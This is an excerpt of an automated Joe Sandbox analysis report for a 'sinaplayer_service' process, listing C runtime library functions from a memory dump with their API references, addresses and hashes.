                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd$?_inconsistency@@CallEncodePointerTranslator
                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                    • API String ID: 2381479982-2084237596
                                                                                                                                                                                                    • Opcode ID: 48f1b49db6120f6558a0c1af5fe27b63dc442970516a0cdd4869e0841f84fd6a
                                                                                                                                                                                                    • Instruction ID: 2c876bade722af71e3b78756d5d01dc0438c3a63bff80f155bbb2036fd55ac57
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 48f1b49db6120f6558a0c1af5fe27b63dc442970516a0cdd4869e0841f84fd6a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D414A3250810AAFEF01CF54CC80FAEB7BAEF84314F1541A8EA1557255E3B5EA52DB91
                                                                                                                                                                                                    Function 6D0ACB83 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6D0ACB8A
                                                                                                                                                                                                    • __ExceptionPtr::__ExceptionPtr.LIBCMT ref: 6D0ACC10
                                                                                                                                                                                                    • _Ptr_base.LIBCMT ref: 6D0ACC36
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Exception$H_prolog3_catchPtr::__Ptr_base
                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                    • API String ID: 3931061724-1018135373
                                                                                                                                                                                                    • Opcode ID: 875dacbc6468ba2d50257c20170d7735a200ec03c55cbca91da63294755d8d07
                                                                                                                                                                                                    • Instruction ID: bd42890a72f72354d245f4ddfa3d72be581826a01930c2735a33f34939637223
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 875dacbc6468ba2d50257c20170d7735a200ec03c55cbca91da63294755d8d07
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3318DB4D0824ADAEB05CFA9D540BEEFBF4AF49304F15405EE915A7281DB748A01CB61
                                                                                                                                                                                                    Function 6D0B442B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: B
                                                                                                                                                                                                    • API String ID: 2959964966-1255198513
                                                                                                                                                                                                    • Opcode ID: f599f8dd930afddf615a9613d1c0dc3c28fdefa2acbfd1d9a17acd7e1b43ae95
                                                                                                                                                                                                    • Instruction ID: dbd98da61df1e4459f8ff7e488f522c3e0c590cc153dd273e9caf3f91745b25c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f599f8dd930afddf615a9613d1c0dc3c28fdefa2acbfd1d9a17acd7e1b43ae95
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A821447290821D9FEF018FA8CC406EEB7B8FB19328F550616E920A7180E779D5158BB5
                                                                                                                                                                                                    Function 6D09E1D6 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: B
                                                                                                                                                                                                    • API String ID: 2959964966-1255198513
                                                                                                                                                                                                    • Opcode ID: 3597054232ebe8e9be101bd05bcfa064ecb828ff52cdefea82de048b8e576a24
                                                                                                                                                                                                    • Instruction ID: 4033cf227ae4f903cd6ca91465702272431d750550ff697dc39f6d4704c16f69
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3597054232ebe8e9be101bd05bcfa064ecb828ff52cdefea82de048b8e576a24
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC219572D0921E8FEF019FE8CC406EE77B4FB09724F150216E924EB291E73598019BB5
                                                                                                                                                                                                    Function 6D0AAA6B Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: NameName::
                                                                                                                                                                                                    • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                                    • API String ID: 1333004437-2211150622
                                                                                                                                                                                                    • Opcode ID: d6ec0dd1b59342d9764ef779ed65ad1e0694c95317702097f5ea0c06e915d365
                                                                                                                                                                                                    • Instruction ID: 1dcd81dbbd4cafc554b09fdd42699e20a2d99fd1b1a4ad8bd016add1ff956459
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6ec0dd1b59342d9764ef779ed65ad1e0694c95317702097f5ea0c06e915d365
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B21597864824A9FEB45CF9CD490BBA7BF0BB0E341F14815EE95ACB342DB759900CB84
                                                                                                                                                                                                    Function 6D11E9F4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindCompleteObject.LIBCMT ref: 6D11EA15
                                                                                                                                                                                                    • FindMITargetTypeInstance.LIBCMT ref: 6D11EA4E
                                                                                                                                                                                                      • Part of subcall function 6D11E634: strcmp.MSVCR120(?,-00000008,?,00000000,00000000), ref: 6D11E686
                                                                                                                                                                                                      • Part of subcall function 6D11E634: strcmp.MSVCR120(?,?,?,00000000,00000000), ref: 6D11E6B4
                                                                                                                                                                                                      • Part of subcall function 6D11E634: PMDtoOffset.LIBCMT ref: 6D11E6C6
                                                                                                                                                                                                    • FindVITargetTypeInstance.LIBCMT ref: 6D11EA55
                                                                                                                                                                                                    • PMDtoOffset.LIBCMT ref: 6D11EA66
                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT(Bad dynamic_cast!,?,?,?,?,?,6D11EAE8,00000018), ref: 6D11EA8F
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D11EB04,Bad dynamic_cast!,?,?,?,?,?,6D11EAE8,00000018), ref: 6D11EA9D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Find$InstanceOffsetTargetTypestrcmp$CompleteExceptionObjectThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                    • String ID: Bad dynamic_cast!
                                                                                                                                                                                                    • API String ID: 3548542081-2956939130
                                                                                                                                                                                                    • Opcode ID: 8bfb87be80494eb107a73e97c2f1f2a793391a911ea9a4d36ddf90228ec42b2d
                                                                                                                                                                                                    • Instruction ID: 98790ac5d3591b021b59a1400eb6612ba161f6624f53995c4449e93404657bbf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8bfb87be80494eb107a73e97c2f1f2a793391a911ea9a4d36ddf90228ec42b2d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5021C3B290C2059FDB01CFE8EC44AAE7B74BF49340F164029E511E7649DBB59B08DB90
                                                                                                                                                                                                    Function 6D096FD5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D08F764: _getptd.MSVCR120(00000001,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D08F77A
                                                                                                                                                                                                    • _strnicoll_l.MSVCR120(?,?,?,?, *\,005C2D90,005C2A20,00000000,005C2D90,00000000,00000000,00000000), ref: 6D097029
                                                                                                                                                                                                      • Part of subcall function 6D096F4B: __crtCompareStringA.MSVCR120(?,?,00001001,005C2D90,?,?,?,00000000,00000000,?,7FFFFFFF,00000000,?, *\,005C2D90,005C2A20), ref: 6D096FAF
                                                                                                                                                                                                    • _errno.MSVCR120( *\,005C2D90,005C2A20,00000000,005C2D90,00000000,00000000,00000000), ref: 6D0D777C
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120( *\,005C2D90,005C2A20,00000000,005C2D90,00000000,00000000,00000000), ref: 6D0D7787
                                                                                                                                                                                                    • _errno.MSVCR120( *\,005C2D90,005C2A20,00000000,005C2D90,00000000,00000000,00000000), ref: 6D0D7796
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120( *\,005C2D90,005C2A20,00000000,005C2D90,00000000,00000000,00000000), ref: 6D0D77A1
                                                                                                                                                                                                    • __crtCompareStringA.MSVCR120(?,?,00001001,?,?,?,?,?, *\,005C2D90,005C2A20,00000000,005C2D90,00000000,00000000,00000000), ref: 6D0D77C1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CompareString__crt_errno_invalid_parameter_noinfo$_getptd_strnicoll_l
                                                                                                                                                                                                    • String ID: *\
                                                                                                                                                                                                    • API String ID: 1228067600-3401207301
                                                                                                                                                                                                    • Opcode ID: 26e6da545074f4cdd8a504864dee35bddd7cbb4341ca73ddcb67acf8c5d46a9e
                                                                                                                                                                                                    • Instruction ID: 9de4d0335c90aac16b440f8e396f52d26ef175b1c941dd72eb485be030be9a47
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26e6da545074f4cdd8a504864dee35bddd7cbb4341ca73ddcb67acf8c5d46a9e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3111BE72E04206ABFB058E64CC40BBFB7A9AF94360F118659A9205B1A0EB719C119BE1
                                                                                                                                                                                                    Function 6D1278D4 Relevance: 12.2, APIs: 8, Instructions: 222stringCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • strncpy_s.MSVCR120(?,?,?,00000002), ref: 6D127968
                                                                                                                                                                                                    • _ismbblead.MSVCR120(00000001), ref: 6D127992
                                                                                                                                                                                                    • strncpy_s.MSVCR120(?,?,00000000,00000000), ref: 6D1279DF
                                                                                                                                                                                                    • strncpy_s.MSVCR120(00000000,?,?,00000000), ref: 6D127A14
                                                                                                                                                                                                    • strncpy_s.MSVCR120(00000000,?,00000000,?), ref: 6D127A30
                                                                                                                                                                                                    • strncpy_s.MSVCR120(00000000,?,?,?), ref: 6D127A4E
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D127AB2
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D127AC0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: strncpy_s$_errno_invalid_parameter_noinfo_ismbblead
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 519590025-0
                                                                                                                                                                                                    • Opcode ID: 9c353a184572e0facde5fd778c95f8e970b50d570a1baa377f4b5500e9aeb446
                                                                                                                                                                                                    • Instruction ID: 4380d239b6b316c89834bfc3a0011b3a8303f8275839e61c31e7481f97da3caa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c353a184572e0facde5fd778c95f8e970b50d570a1baa377f4b5500e9aeb446
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA718E31E0434B9BEF268E28C850BBB77A5AF65364F19415BEC5466248D3F2DAC0C7A1
                                                                                                                                                                                                    Function 6D095938 Relevance: 12.2, APIs: 8, Instructions: 167COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _filbuf.MSVCR120(?,00000000), ref: 6D095905
                                                                                                                                                                                                    • memcpy_s.MSVCR120(?,?,?,?,00000000), ref: 6D0959E0
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?,00000000), ref: 6D095F46
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D5577
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D5582
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,000000FF), ref: 6D0D5598
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,000000FF,00000000), ref: 6D0D55E7
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D55EF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errnomemset$_filbuf_fileno_invalid_parameter_noinfomemcpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4246007277-0
                                                                                                                                                                                                    • Opcode ID: 57bad2a4ea697ecff6aff00c7a9e90cf418f640a5f96defc0ab8a533490cb8c9
                                                                                                                                                                                                    • Instruction ID: eb99670d2084b3e96776976450d5a03f4f53a5f0c2643c359212af8a5c1af964
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57bad2a4ea697ecff6aff00c7a9e90cf418f640a5f96defc0ab8a533490cb8c9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B051E438A143069BFB158E7A88887BE77B6FF05321F10972AE8358B2D0D770D9509B51
                                                                                                                                                                                                    Function 6D0F4DA7 Relevance: 12.2, APIs: 8, Instructions: 158COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR120 ref: 6D0F4DEA
                                                                                                                                                                                                    • List.LIBCMT ref: 6D0F4E52
                                                                                                                                                                                                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 6D0F4E69
                                                                                                                                                                                                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 6D0F4E7C
                                                                                                                                                                                                    • List.LIBCMT ref: 6D0F4EC8
                                                                                                                                                                                                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 6D0F4EDF
                                                                                                                                                                                                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 6D0F4EF2
                                                                                                                                                                                                    • List.LIBCMT ref: 6D0F4F3B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::FindGroupRing::ScheduleSchedulingSegment$List$AcquireConcurrency@@Lock@details@ReaderWrite@_Writer
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 230955726-0
                                                                                                                                                                                                    • Opcode ID: 266e769967685039b14a5621c483210179a375d5f116787b4f7c2708b98a48a2
                                                                                                                                                                                                    • Instruction ID: 44617f0fc4b5d9e314577dc8d14fdd7c5edd90757cbce405150c12054d021a0e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 266e769967685039b14a5621c483210179a375d5f116787b4f7c2708b98a48a2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A514071A0420AAFEB18CB54C994FEEB7F8FF49314F214169ED1997641C734EA46CB90
                                                                                                                                                                                                    Function 6D107B69 Relevance: 12.1, APIs: 8, Instructions: 135timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D107B8D
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D107B97
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _get_timezone.MSVCR120(?), ref: 6D107BBA
                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 6D107BE0
                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,23C34600,00000000), ref: 6D107C2D
                                                                                                                                                                                                    • __aullrem.LIBCMT ref: 6D107C99
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D107CCE
                                                                                                                                                                                                    • _gmtime64_s.MSVCR120(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6D107CE7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$FileInformationSystemZone__aullrem_errno_get_timezone_gmtime64_s_invalid_parameter_invalid_parameter_noinfo_invoke_watson
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2378273451-0
                                                                                                                                                                                                    • Opcode ID: 16dc1e97035ee143ac988a0446ff209cf198baa3bac482bd5c8357e778838cac
                                                                                                                                                                                                    • Instruction ID: 3203d63833d9e72db26dedcf2c3d1d84c09ca6cfe2c6d56f452cbae9a0e54a83
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16dc1e97035ee143ac988a0446ff209cf198baa3bac482bd5c8357e778838cac
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC41FAB1E08315ABEB10EF74ED40FBA73B9EF49714F11455AE608D7280DBB09980CB65
                                                                                                                                                                                                    Function 6D09EB8E Relevance: 12.1, APIs: 8, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(?,00000000,6D15F520,?,?,6D09EBC6,?), ref: 6D0D504D
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,00000000,6D15F520,?,?,6D09EBC6,?), ref: 6D0D5058
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
